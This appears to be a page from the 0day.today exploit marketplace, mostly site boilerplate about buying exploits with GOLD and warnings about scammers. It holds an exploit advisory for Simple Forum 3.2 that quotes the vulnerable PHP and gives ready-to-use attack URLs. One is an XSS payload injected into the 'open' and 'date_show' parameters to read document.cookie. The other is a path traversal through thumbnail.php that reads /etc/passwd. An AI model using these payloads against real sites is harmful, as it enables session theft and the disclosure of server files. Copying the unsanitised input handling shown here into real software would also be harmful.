0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Simple Forum 3.2 (FD/XSS) Multiple Remote Vulnerabilities
========================================================= Simple Forum 3.2 (FD/XSS) Multiple Remote Vulnerabilities ========================================================= ######################################################## # # # SIMPLE FORUM v 3.2 MULTIPLE VULNERABILITIES # # author : tomplixsee # # # # software : SIMPLE FORUM v3.2 # # download : http://www.gerd-tentler.de/tools/forum/# # # ######################################################## 1.XSS vulnerable code on forum.php <? ..... if(isset($_REQUEST['date_show'])) $date_show = $_REQUEST['date_show']; ..... if(isset($_REQUEST['open'])) $open = $_REQUEST['open']; ..... <input type="hidden" name="date_show" value="<? echo $date_show; ?>"> <input type="hidden" name="open" value="<? echo $open; ?>"> ..... example: http://target/path/forum.php?open="/><script>alert(document.cookie)</script> http://target/path/forum.php?date_show="/><script>alert(document.cookie)</script> 2.Remote File Disclosure vulnerable code on thumbnail.php <? .... if(isset($_REQUEST['file'])) $file = $_REQUEST['file']; if(isset($_REQUEST['type'])) $type = $_REQUEST['type']; .... switch($type) { case 1: if($img && function_exists('ImageGIF')) { header('Content-type: image/gif'); @ImageGIF($img); } else if($img && function_exists('ImagePNG')) { header('Content-type: image/png'); @ImagePNG($img); } else { header('Content-type: image/gif'); readfile($file); } break; case 2: header('Content-type: image/jpeg'); if($img && function_exists('ImageJPEG')) @ImageJPEG($img); else readfile($file); break; case 3: header('Content-type: image/png'); if($img && function_exists('ImagePNG')) @ImagePNG($img); else readfile($file); break; } .... ?> example: http://target/path/thumbnail.php?type=3&file=../../../../../../../etc/passwd then try to view the page source :D salam tuk: ira, sukabirus network community, akillers 179,bidulux,sibalbal,crutz_ao, # 0day.today [2024-12-24] #